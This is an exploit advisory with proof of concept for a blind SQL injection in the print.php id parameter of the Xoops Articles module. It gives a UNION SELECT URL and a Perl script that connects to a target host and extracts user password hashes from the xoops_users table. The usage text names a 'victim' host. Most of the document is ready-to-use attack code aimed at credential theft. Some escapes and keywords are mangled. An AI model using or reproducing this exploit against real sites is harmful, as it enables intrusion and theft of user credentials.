Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC Type : SQL Injection Release Date : {2007-03-26} Product / Vendor : Xoops Portal http://www.Xoops.Org Bug : http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0 PoC : http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELE CT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1 /* Exploit : #!/usr/bin/perl -w ############################################# #Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]# ############################################# use IO::Socket; if (@ARGV != 3) { print "n-----------------------------------n"; print "Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploitn"; print "-----------------------------------n"; print "nUniquE-Key{UniquE-Cracker}n"; print "UniquE[at]UniquE-Key.ORGn"; print "http://UniquE-Key.ORGn"; print "n-----------------------------------n"; print "nUsage: $0 <server> <path> <uid>n"; print "Examp: $0 www.victim.com /path 1n"; print "n-----------------------------------n"; exit (); } $server = $ARGV[0]; $path = $ARGV[1]; $uid = $ARGV[2]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL, NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0nHost: %snAccept: */*nConnection: closenn", $path,$server,$uid); while(<$socket>) { if (/>(w{32})</) { print "nID '$uid' User Password :nn$1n"; } } Tested : All Version Author : UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org